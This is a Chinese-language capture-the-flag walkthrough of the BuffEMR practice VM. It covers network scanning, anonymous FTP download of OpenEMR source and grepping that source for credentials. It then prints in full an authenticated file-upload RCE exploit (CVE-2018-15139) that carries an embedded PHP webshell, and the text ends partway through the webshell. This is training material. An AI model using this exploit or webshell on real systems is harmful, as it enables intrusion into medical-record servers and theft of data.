靶机渗透练习104-BuffEMR:1.0.1

靶机描述

靶机地址:https://www.vulnhub.com/entry/buffemr-101,717/

Description

This is a vulnerable linux box for testing your web application exploitation skills and you will learn basics of binary exploitation.

This works better with VirtualBox rather than VMware. ## Changelog v1.0.1 - 2021-08-31 v1.0.0 - 2021-07-29

一、搭建靶机环境

攻击机Kali

IP地址:192.168.11.130

靶机

IP地址:192.168.11.137

注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式)

该靶机环境搭建如下

  1. 将下载好的靶机环境,导入 VIrtualBox,设置为仅主机模式
  2. Kali设置为双网卡,网卡eth0设置为仅主机模式
  3. 本机上将两个网卡进行桥接

二、实战

2.1网络扫描

2.1.1 启动靶机和Kali后进行扫描

方法一、arp-scan -I eth0 -l (指定网卡扫)
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# arp-scan -I eth0 -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:46:e0:a0, IPv4: 192.168.11.130
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.11.1    00:50:56:c0:00:01       VMware, Inc.
192.168.11.137  08:00:27:65:d2:49       PCS Systemtechnik GmbH
192.168.11.254  00:50:56:f5:cd:ff       VMware, Inc.

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.981 seconds (129.23 hosts/sec). 3 responded

方法二、masscan 扫描的网段 -p 扫描端口号
masscan 192.168.11.0/24 -p 80,22
方法三、netdiscover -i 网卡-r 网段
netdiscover -i eth1 -r 192.168.11.0/24
方法四、fping -aqg 指定网段
fping -aqg 192.168.11.0/24
方法五、待补充

2.1.2 查看靶机开放的端口

使用nmap -A -sV -T4 -p- 靶机ip查看靶机开放的端口

┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# nmap -A -sV -T4 -p- 192.168.11.137
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-04 15:29 CST
Nmap scan report for 192.168.11.137 (192.168.11.137)
Host is up (0.0013s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    3 0        0            4096 Jun 21  2021 share
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.11.130
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 92:4c:ae:7b:01:fe:84:f9:5e:f7:f0:da:91:e4:7a:cf (RSA)
|   256 95:97:eb:ea:5c:f8:26:94:3c:a7:b6:b4:76:c3:27:9c (ECDSA)
|_  256 cb:1c:d9:56:4f:7a:c0:01:25:cd:98:f6:4e:23:2e:77 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 08:00:27:65:D2:49 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.33 ms 192.168.11.137 (192.168.11.137)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.29 seconds

开放了21、22和80端口

2.2 枚举漏洞

2.2.1 21端口分析

尝试ftp匿名登录

┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# ftp 192.168.11.137
Connected to 192.168.11.137.
220 (vsFTPd 3.0.3)
Name (192.168.11.137:hirak0): anonymous                
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||6096|)
150 Here comes the directory listing.
drwxr-xr-x    3 0        0            4096 Jun 21  2021 share
226 Directory send OK.
ftp> ls share
229 Entering Extended Passive Mode (|||44969|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0              20 Jun 21  2021 README
drwxr-xr-x   31 0        0            4096 Jun 21  2021 openemr
226 Directory send OK.
ftp> ls share/openemr
229 Entering Extended Passive Mode (|||48888|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0            5526 Jun 21  2021 CODE_OF_CONDUCT.md
-rw-r--r--    1 0        0            2876 Jun 21  2021 CONTRIBUTING.md
drwxr-xr-x    4 0        0            4096 Jun 21  2021 Documentation
-rw-r--r--    1 0        0           35147 Jun 21  2021 LICENSE
-rw-r--r--    1 0        0            3356 Jun 21  2021 README.md
-rw-r--r--    1 0        0           20701 Jun 21  2021 acknowledge_license_cert.html
-rw-r--r--    1 0        0           19560 Jun 21  2021 acl_setup.php
-rw-r--r--    1 0        0           48330 Jun 21  2021 acl_upgrade.php
-rw-r--r--    1 0        0            4988 Jun 21  2021 admin.php
-rw-r--r--    1 0        0            3805 Jun 21  2021 bower.json
-rw-r--r--    1 0        0            6102 Jun 21  2021 build.xml
drwxr-xr-x    2 0        0            4096 Jun 21  2021 ccdaservice
drwxr-xr-x    4 0        0            4096 Jun 21  2021 ccr
drwxr-xr-x    2 0        0            4096 Jun 21  2021 ci
drwxr-xr-x    2 0        0            4096 Jun 21  2021 cloud
drwxr-xr-x    7 0        0            4096 Jun 21  2021 common
-rw-r--r--    1 0        0            3301 Jun 21  2021 composer.json
-rw-r--r--    1 0        0          265675 Jun 21  2021 composer.lock
drwxr-xr-x    2 0        0            4096 Jun 21  2021 config
drwxr-xr-x   11 0        0            4096 Jun 21  2021 contrib
-rw-r--r--    1 0        0             108 Jun 21  2021 controller.php
drwxr-xr-x    2 0        0            4096 Jun 21  2021 controllers
drwxr-xr-x    2 0        0            4096 Jun 21  2021 custom
-rwxr-xr-x    1 0        0            3995 Jun 21  2021 docker-compose.yml
drwxr-xr-x    2 0        0            4096 Jun 21  2021 entities
drwxr-xr-x    8 0        0            4096 Jun 21  2021 gacl
drwxr-xr-x    2 0        0            4096 Jun 21  2021 images
-rw-r--r--    1 0        0             901 Jun 21  2021 index.php
drwxr-xr-x   32 0        0            4096 Jun 21  2021 interface
-rw-r--r--    1 0        0            5381 Jun 21  2021 ippf_upgrade.php
drwxr-xr-x   25 0        0            4096 Jun 21  2021 library
drwxr-xr-x    3 0        0            4096 Jun 21  2021 modules
drwxr-xr-x    3 0        0            4096 Jun 21  2021 myportal
drwxr-xr-x    4 0        0            4096 Jun 21  2021 patients
drwxr-xr-x    6 0        0            4096 Jun 21  2021 phpfhir
drwxr-xr-x   10 0        0            4096 Jun 21  2021 portal
drwxr-xr-x    5 0        0            4096 Jun 21  2021 public
drwxr-xr-x    2 0        0            4096 Jun 21  2021 repositories
drwxr-xr-x    2 0        0            4096 Jun 21  2021 services
-rw-r--r--    1 0        0           40570 Jun 21  2021 setup.php
drwxr-xr-x    3 0        0            4096 Jun 21  2021 sites
drwxr-xr-x    2 0        0            4096 Jun 21  2021 sql
-rw-r--r--    1 0        0            4650 Jun 21  2021 sql_patch.php
-rw-r--r--    1 0        0            5375 Jun 21  2021 sql_upgrade.php
drwxr-xr-x   15 0        0            4096 Jun 21  2021 templates
drwxr-xr-x    5 0        0            4096 Jun 21  2021 tests
drwxr-xr-x   34 0        0            4096 Jun 21  2021 vendor
-rw-r--r--    1 0        0            2119 Jun 21  2021 version.php
226 Directory send OK.

可以发现share/openemr目录下有一些网站路径下的源码文件

直接将整改目录扒拉下来

┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# wget -r -np -nH ftp://192.168.11.137/share/openemr


``````

下载完毕 --2024-04-04 15:37:37--
总用时:19s
下载了:3438 个文件,5.5s (21.4 MB/s) 中的 117M

先放着

2.2.2 22端口分析

需要爆破,暂时没有好的字典

2.2.3 80端口分析

访问80端口:http://192.168.11.137

image-20240404153948682

扫描一下目录

常规文件扫描
┌──(root㉿MYsec)-[/home/…/Vulhub/104/share/openemr]
└─# gobuster dir -u http://192.168.11.137 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x txt,php,html,conf -e -k -r -q
http://192.168.11.137/index.html           (Status: 200) [Size: 10918]
http://192.168.11.137/.php                 (Status: 403) [Size: 279]
http://192.168.11.137/.html                (Status: 403) [Size: 279]
http://192.168.11.137/.php                 (Status: 403) [Size: 279]
http://192.168.11.137/.html                (Status: 403) [Size: 279]
http://192.168.11.137/server-status        (Status: 403) [Size: 279]

可执行文件扫描
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# gobuster dir -u http://192.168.11.137 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x js,aspx,cgi,sh,jsp -e -k -r -q
http://192.168.11.137/server-status        (Status: 403) [Size: 279]
压缩包,备份扫描
e/hirak0/Vulhub/104]
└─# gobuster dir -u http://192.168.11.137 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x rar,zip,7z,tar.gz,bak,txt,old,temp -e -k -r -q 
http://192.168.11.137/server-status        (Status: 403) [Size: 279]

均没有啥发现,感觉是网站根路径写错了,21端口上有个目录share/openemr下有源码,会不会网站路径是share/openemr,拼接访问看看

经过尝试,网站根路径为:http://192.168.11.137/openemr

image-20240404154742568

这里需要对down下来的源码做一下审计了

grep -r "admin" *
grep -r "root" *
grep -r "'admin'" *
grep -r "admin:" *
┌──(root㉿MYsec)-[/home/…/Vulhub/104/share/openemr]
└─# grep -r "admin:" *
docker-compose.yml:  phpmyadmin:
portal/messaging/secure_chat.php:    $_SERVER[REMOTE_ADDR] = 'admin::' . $_SERVER[REMOTE_ADDR];
public/assets/angular-1-5-8/angular.js: *   $provide.value('RoleLookup', { admin: 0, writer: 1, reader: 2 });
sql/4_2_0-to-4_2_1_upgrade.sql:INSERT INTO `clinical_rules` ( `id`, `pid`, `active_alert_flag`, `passive_alert_flag`, `cqm_flag`, `cqm_nqf_code`, `cqm_pqri_code`, `amc_flag`, `amc_code`, `patient_reminder_flag`, `access_control` ) VALUES ('rule_socsec_entry', 0, 0, 0, 0, '', '', 0, '', 0, 'admin:practice');
sql/database.sql:INSERT INTO `clinical_rules` ( `id`, `pid`, `active_alert_flag`, `passive_alert_flag`, `cqm_flag`, `cqm_nqf_code`, `cqm_pqri_code`, `amc_flag`, `amc_code`, `patient_reminder_flag`, `access_control` ) VALUES ('rule_socsec_entry', 0, 0, 0, 0, '', '', 0, '', 0, 'admin:practice');
tests/test.accounts:admin:Monster123
┌──(root㉿MYsec)-[/home/…/Vulhub/104/share/openemr]
└─# cat tests/test.accounts 
this is a test admin account:

admin:Monster123

这里可以看到提示,这是一个测试账号

再看看有没数据库的信息

┌──(root㉿MYsec)-[/home/…/Vulhub/104/share/openemr]
└─# grep -r "MYSQL_ROOT_PASSWORD" *
docker-compose.yml:      MYSQL_ROOT_PASSWORD: root
docker-compose.yml:      MYSQL_ROOT_PASSWORD: root
docker-compose.yml:      MYSQL_ROOT_PASSWORD: root
docker-compose.yml:      MYSQL_ROOT_PASSWORD: root
docker-compose.yml:      MYSQL_ROOT_PASSWORD: root
docker-compose.yml:      MYSQL_ROOT_PASSWORD: root
docker-compose.yml:      MYSQL_ROOT_PASSWORD: root
docker-compose.yml:      MYSQL_ROOT_PASSWORD: root
docker-compose.yml:      MYSQL_ROOT_PASSWORD: root
┌──(root㉿MYsec)-[/home/…/Vulhub/104/share/openemr]
└─# cat docker-compose.yml 
#
# This is for building a local OpenEMR development and testing environment.
# (Recommend not running it from your git repo and instead mirroring your
#  git repo to a testing directory (such as your web directory).)
#
# Brief instructions on how to use (for fuller instructions and examples,
#  see the document at contrib/util/docker/README.md):
#   1. docker-compose up -d
#   2. http://localhost:8080 to run setup in openemr (alpine 3.7 with PHP 7.1)
#      or
#      https://localhost:8090 to run setup in openemr with SSL (alpine 3.7 with PHP 7.1)
#      or
#      http://localhost:8081 to run setup in openemr (alpine edge with PHP 7.2)
#      or
#      https://localhost:8091 to run setup in openemr with SSL (alpine edge with PHP 7.2)
#  On the main setup input screen:
#   1. for Server Host, use either 'mariadb' or 'mysql' or `mariadb-dev` or 'mysql-dev' or 'mysql-old' or 'mysql-very-old' or 'mariadb-old' or 'mariadb-very-old' or 'mariadb-very-very-old'  (have both mariadb/mysql/mariadb-dev/mysql-dev dockers ready to go make testing either one easy; mysql is version 5.7; mysql-dev is version 8; mysql-old is version 5.6; mysql-very-old is version 5.5; mariadb is version 10.2 and mariadb-dev is version 10.3; mariadb-old is version 10.1; mariadb-very-old is version 10.0; mariadb-very-very-old is version 5.5)
#   2. for Root Pass, use 'root'
#   3. for User Hostname, use '%'
#  And when need to tear it down and restart it
#   1. docker-compose down -v
#   2. docker-compose up -d
#  Can see databases via http://localhost:8100
#
version: '3.1'
services:
  openemr-7-1:
    restart: always
    image: openemr/openemr:flex
    ports:
    - 8080:80
    - 8090:443
    volumes:
    - .:/var/www/localhost/htdocs/openemr
    environment:
      EMPTY: "yes"
  openemr-7-2:
    restart: always
    image: openemr/openemr:flex-edge
    ports:
    - 8081:80
    - 8091:443
    volumes:
    - .:/var/www/localhost/htdocs/openemr
    environment:
      EMPTY: "yes"
  mariadb:
    restart: always
    image: mariadb:10.2
    command: ['mysqld','--character-set-server=utf8']
    environment:
      MYSQL_ROOT_PASSWORD: root
  mysql:
    restart: always
    image: mysql:5.7
    command: ['mysqld','--character-set-server=utf8']
    environment:
      MYSQL_ROOT_PASSWORD: root
  mariadb-dev:
    restart: always
    image: mariadb:10.3
    command: ['mysqld','--character-set-server=utf8']
    environment:
      MYSQL_ROOT_PASSWORD: root
  mysql-dev:
    restart: always
    image: mysql:8
    command: ['mysqld','--character-set-server=utf8','--default-authentication-plugin=mysql_native_password']
    environment:
      MYSQL_ROOT_PASSWORD: root
  mariadb-old:
    restart: always
    image: mariadb:10.1
    command: ['mysqld','--character-set-server=utf8']
    environment:
      MYSQL_ROOT_PASSWORD: root
  mariadb-very-old:
    restart: always
    image: mariadb:10.0
    command: ['mysqld','--character-set-server=utf8']
    environment:
      MYSQL_ROOT_PASSWORD: root
  mariadb-very-very-old:
    restart: always
    image: mariadb:5.5
    command: ['mysqld','--character-set-server=utf8']
    environment:
      MYSQL_ROOT_PASSWORD: root
  mysql-old:
    restart: always
    image: mysql:5.6
    command: ['mysqld','--character-set-server=utf8']
    environment:
      MYSQL_ROOT_PASSWORD: root
  mysql-very-old:
    restart: always
    image: mysql:5.5
    command: ['mysqld','--character-set-server=utf8']
    environment:
      MYSQL_ROOT_PASSWORD: root
  phpmyadmin:
    restart: always
    image: phpmyadmin/phpmyadmin
    ports:
    - 8100:80
    environment:
      PMA_HOSTS: mariadb,mysql,mariadb-dev,mysql-dev,mysql-old,mysql-very-old,mariadb-old,mariadb-very-old,mariadb-very-very-old
  couchdb:
    restart: always
    image: couchdb
    ports:
    - 5984:5984
    - 6984:6984
    environment:
      COUCHDB_USER: admin
      COUCHDB_PASSWORD: password
  orthanc:
    restart: always
    image: jodogne/orthanc-plugins
    ports:
    - 4242:4242
    - 8042:8042
                                                              
                                                              
  COUCHDB_USER: admin
  COUCHDB_PASSWORD: password
┌──(root㉿MYsec)-[/home/…/Vulhub/104/share/openemr]
└─# cat index.php 
<?php
// This program is free software; you can redistribute it and/or
// modify it under the terms of the GNU General Public License
// as published by the Free Software Foundation; either version 2
// of the License, or (at your option) any later version.
// Set the site ID if required.  This must be done before any database
// access is attempted.

if (!empty($_GET['site'])) {
    $site_id = $_GET['site'];
} else if (is_dir("sites/" . $_SERVER['HTTP_HOST'])) {
    $site_id = $_SERVER['HTTP_HOST'];
} else {
    $site_id = 'default';
}

if (empty($site_id) || preg_match('/[^A-Za-z0-9\\-.]/', $site_id)) {
    die("Site ID '".htmlspecialchars($site_id, ENT_NOQUOTES)."' contains invalid characters.");
}

require_once "sites/$site_id/sqlconf.php";

if ($config == 1) {
    header("Location: interface/login/login.php?site=$site_id");
} else {
    header("Location: setup.php?site=$site_id");
}
                     

发现登录这边有调用sites/$site_id/sqlconf.php

去看看这个文件

┌──(root㉿MYsec)-[/home/…/Vulhub/104/share/openemr]
└─# cd sites     
                                                                                                                                                                                                          
┌──(root㉿MYsec)-[/home/…/104/share/openemr/sites]
└─# ls
default
                                                                                                                                                                                                          
┌──(root㉿MYsec)-[/home/…/104/share/openemr/sites]
└─# cd default 
                                                                                                                                                                                                          
┌──(root㉿MYsec)-[/home/…/share/openemr/sites/default]
└─# ls
clickoptions.txt  config.php  faxcover.txt  faxtitle.eps  images  LBF  referral_template.html  sqlconf.php  statement.inc.php
                                                                                                                                                                                                          
┌──(root㉿MYsec)-[/home/…/share/openemr/sites/default]
└─# cat sqlconf.php 
<?php
//  OpenEMR
//  MySQL Config

$host   = 'localhost';
$port   = '3306';
$login  = 'openemruser';
$pass   = 'openemruser123456';
$dbase  = 'openemr';

//Added ability to disable
//utf8 encoding - bm 05-2009
global $disable_utf8_flag;
$disable_utf8_flag = false;

$sqlconf = array();
global $sqlconf;
$sqlconf["host"]= $host;
$sqlconf["port"] = $port;
$sqlconf["login"] = $login;
$sqlconf["pass"] = $pass;
$sqlconf["dbase"] = $dbase;
//////////////////////////
//////////////////////////
//////////////////////////
//////DO NOT TOUCH THIS///
$config = 1; /////////////
//////////////////////////
//////////////////////////
//////////////////////////
?>

这里成功拿到mysql的账户密码

$host   = 'localhost';
$port   = '3306';
$login  = 'openemruser';
$pass   = 'openemruser123456';
$dbase  = 'openemr';

利用测试账号成功登录后台并发现cms版本号

image-20240404163852318

2.3 漏洞利用

kali本地漏洞库搜索一下

┌──(root㉿MYsec)-[/home/…/Vulhub/104/share/openemr]
└─# searchsploit openemr        
------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                 |  Path
------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenEMR - 'site' Cross-Site Scripting                                                                                          | php/webapps/38328.txt
OpenEMR - Arbitrary '.PHP' File Upload (Metasploit)                                                                            | php/remote/24529.rb
OpenEMR 2.8.1 - 'fileroot' Remote File Inclusion                                                                               | php/webapps/1886.txt
OpenEMR 2.8.1 - 'srcdir' Multiple Remote File Inclusions                                                                       | php/webapps/2727.txt
OpenEMR 2.8.2 - 'Import_XML.php' Remote File Inclusion                                                                         | php/webapps/29556.txt
OpenEMR 2.8.2 - 'Login_Frame.php' Cross-Site Scripting                                                                         | php/webapps/29557.txt
OpenEMR 3.2.0 - SQL Injection / Cross-Site Scripting                                                                           | php/webapps/15836.txt
OpenEMR 4 - Multiple Vulnerabilities                                                                                           | php/webapps/18274.txt
OpenEMR 4.0 - Multiple Cross-Site Scripting Vulnerabilities                                                                    | php/webapps/36034.txt
OpenEMR 4.0.0 - Multiple Vulnerabilities                                                                                       | php/webapps/17118.txt
OpenEMR 4.1 - '/contrib/acog/print_form.php?formname' Traversal Local File Inclusion                                           | php/webapps/36650.txt
OpenEMR 4.1 - '/Interface/fax/fax_dispatch.php?File' 'exec()' Call Arbitrary Shell Command Execution                           | php/webapps/36651.txt
OpenEMR 4.1 - '/Interface/patient_file/encounter/load_form.php?formname' Traversal Local File Inclusion                        | php/webapps/36649.txt
OpenEMR 4.1 - '/Interface/patient_file/encounter/trend_form.php?formname' Traversal Local File Inclusion                       | php/webapps/36648.txt
OpenEMR 4.1 - 'note' HTML Injection                                                                                            | php/webapps/38654.txt
OpenEMR 4.1.0 - 'u' SQL Injection                                                                                              | php/webapps/49742.py
OpenEMR 4.1.1 - 'ofc_upload_image.php' Arbitrary File Upload                                                                   | php/webapps/24492.php
OpenEMR 4.1.1 Patch 14 - Multiple Vulnerabilities                                                                              | php/webapps/28329.txt
OpenEMR 4.1.1 Patch 14 - SQL Injection / Privilege Escalation / Remote Code Execution (Metasploit)                             | php/remote/28408.rb
OpenEMR 4.1.2(7) - Multiple SQL Injections                                                                                     | php/webapps/35518.txt
OpenEMR 5.0.0 - OS Command Injection / Cross-Site Scripting                                                                    | php/webapps/43232.txt
OpenEMR 5.0.0 - Remote Code Execution (Authenticated)                                                                          | php/webapps/49983.py
OpenEMR 5.0.1 - 'controller' Remote Code Execution                                                                             | php/webapps/48623.txt
OpenEMR 5.0.1 - Remote Code Execution (1)                                                                                      | php/webapps/48515.py
OpenEMR 5.0.1 - Remote Code Execution (Authenticated) (2)                                                                      | php/webapps/49486.rb
OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated)                                                    | php/webapps/49998.py
OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2)                                                | php/webapps/50122.rb
OpenEMR 5.0.1.3 - (Authenticated) Arbitrary File Actions                                                                       | linux/webapps/45202.txt
OpenEMR 5.0.1.3 - Authentication Bypass                                                                                        | php/webapps/50017.py
OpenEMR 5.0.1.3 - Remote Code Execution (Authenticated)                                                                        | php/webapps/45161.py
OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated)                                                                    | php/webapps/50037.py
OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated) (2)                                                                | php/webapps/50087.rb
OpenEMR 5.0.2.1 - Remote Code Execution                                                                                        | php/webapps/49784.py
OpenEMR 6.0.0 - 'noteid' Insecure Direct Object Reference (IDOR)                                                               | php/webapps/50260.txt
OpenEMR Electronic Medical Record Software 3.2 - Multiple Vulnerabilities                                                      | php/webapps/14011.txt
OpenEMR v7.0.1 - Authentication credentials brute force                                                                        | php/webapps/51413.py
Openemr-4.1.0 - SQL Injection                                                                                                  | php/webapps/17998.txt
------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
                                                                                                                                                                 
┌──(root㉿MYsec)-[/home/…/Vulhub/104/share/openemr]
└─# searchsploit openemr 5.0.1.3
------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                 |  Path
------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated)                                                    | php/webapps/49998.py
OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2)                                                | php/webapps/50122.rb
OpenEMR 5.0.1.3 - (Authenticated) Arbitrary File Actions                                                                       | linux/webapps/45202.txt
OpenEMR 5.0.1.3 - Authentication Bypass                                                                                        | php/webapps/50017.py
OpenEMR 5.0.1.3 - Remote Code Execution (Authenticated)                                                                        | php/webapps/45161.py
------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
                                        

49998.py 漏洞利用

先利用第一个php/webapps/49998.py

┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# cp /usr/share/exploitdb/exploits/php/webapps/49998.py /home/hirak0/Vulhub/104/49998.py
                                                                                                                                                                                                          
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# ll
总计 44
-rwxr-xr-x 1 root root  8583  4月 4日 16:48 45161.py
-rwxr-xr-x 1 root root 23065  4月 4日 17:24 49998.py
drwxr-xr-x 3 root root  4096  4月 4日 15:37 share
-rw-r--r-- 1 root root   309 2021年 6月22日 user.zip
                                                                                                                                                                                                          
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# cat 49998.py 
# Exploit Title: OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated)
# Date 12.06.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_3.zip
# Version: Prior to 5.0.1.4
# Tested on: Ubuntu 18.04
# CVE: CVE-2018-15139
# CWE: CWE-434
# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-15139

'''
Description:
Unrestricted file upload in interface/super/manage_site_files.php in versions of OpenEMR before 5.0.1.4 allows a remote
authenticated attacker to execute arbitrary PHP code by uploading a file with a PHP extension via the images upload
form and accessing it in the images directory.
'''


'''
Banner:
'''
banner ="""
 ___                   _____ __  __ ____            ____   ___   _   _____
  / _ \ _ __   ___ _ __ | ____|  \/  |  _ \          | ___| / _ \ / | |___ /
 | | | | '_ \ / _ \ '_ \|  _| | |\/| | |_) |  _____  |___ \| | | || |   |_ \
 | |_| | |_) |  __/ | | | |___| |  | |  _ <  |_____|  ___) | |_| || |_ ___) |
  \___/| .__/ \___|_| |_|_____|_|  |_|_| \_\         |____(_)___(_)_(_)____/
       |_|

                    _____            _       _ _
                    | ____|_  ___ __ | | ___ (_) |_
                    |  _| \ \/ / '_ \| |/ _ \| | __|
                    | |___ >  <| |_) | | (_) | | |_
                    |_____/_/\_\ .__/|_|\___/|_|\__|
                               |_|

"""
print(banner)


'''
Import required modules
'''
import argparse
import requests


'''
User-Input:
'''
my_parser = argparse.ArgumentParser(description='OpenEMR Remote Code Execution')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
openemr_path = args.PATH
username = args.USERNAME
password = args.PASSWORD

'''
Authentication:
'''
# Preparation:
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/main/main_screen.php?auth=login&site=default'
auth_chek_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/login/login.php?site=default'
response = session.get(auth_chek_url)

# Header (auth):
header = {
    'Host': target_ip,
    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://' + target_ip,
    'Connection': 'close',
    'Referer': auth_chek_url,
    'Upgrade-Insecure-Requests': '1',
}

# Body (auth):
body = {
    'new_login_session_management': '1',
    'authProvider': 'Default',
    'authUser': username,
    'clearPass': password,
    'languageChoice': '1'
}

# Authentication:
print('')
print('[+] Authentication')
auth = session.post(auth_url,headers=header, data=body)


'''
Exploit:
'''
print('')
print('[+] Uploading Webshell:')

# URL:
exploit_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/super/manage_site_files.php'

# Headers (Exploit):
header = {
    "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "Accept-Language": "de,en-US;q=0.7,en;q=0.3",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "multipart/form-data; boundary=---------------------------31900464228840324774249185339",
    "Origin": "http://" + target_ip,
    "Connection": "close",
    "Referer": 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/super/manage_site_files.php',
    "Upgrade-Insecure-Requests": "1"
}

# Body (Exploit):
body = "-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"form_filename\"\r\n\r\n\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"form_filedata\"\r\n\r\n\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n12000000\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"form_image\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php\n\nfunction featureShell($cmd, $cwd) {\n    $stdout = array();\n\n    if (preg_match(\"/^\\s*cd\\s*$/\", $cmd)) {\n        // pass\n    } elseif (preg_match(\"/^\\s*cd\\s+(.+)\\s*(2>&1)?$/\", $cmd)) {\n        chdir($cwd);\n        preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n        chdir($match[1]);\n    } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n        chdir($cwd);\n        preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n        return featureDownload($match[1]);\n    } else {\n        chdir($cwd);\n        exec($cmd, $stdout);\n    }\n\n    return array(\n        \"stdout\" => $stdout,\n        \"cwd\" => getcwd()\n    );\n}\n\nfunction featurePwd() {\n    return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n    chdir($cwd);\n    if ($type == 'cmd') {\n        $cmd = \"compgen -c $fileName\";\n    } else {\n        $cmd = \"compgen -f $fileName\";\n    }\n    $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n    $files = explode(\"\\n\", shell_exec($cmd));\n    return array(\n        'files' => $files,\n    );\n}\n\nfunction featureDownload($filePath) {\n    $file = @file_get_contents($filePath);\n    if ($file === FALSE) {\n        return array(\n            'stdout' => array('File not found / no read permission.'),\n            'cwd' => getcwd()\n        );\n    } else {\n        return array(\n            'name' => basename($filePath),\n            'file' => base64_encode($file)\n        );\n    }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n    chdir($cwd);\n    $f = @fopen($path, 'wb');\n    if ($f === FALSE) {\n        return array(\n            'stdout' 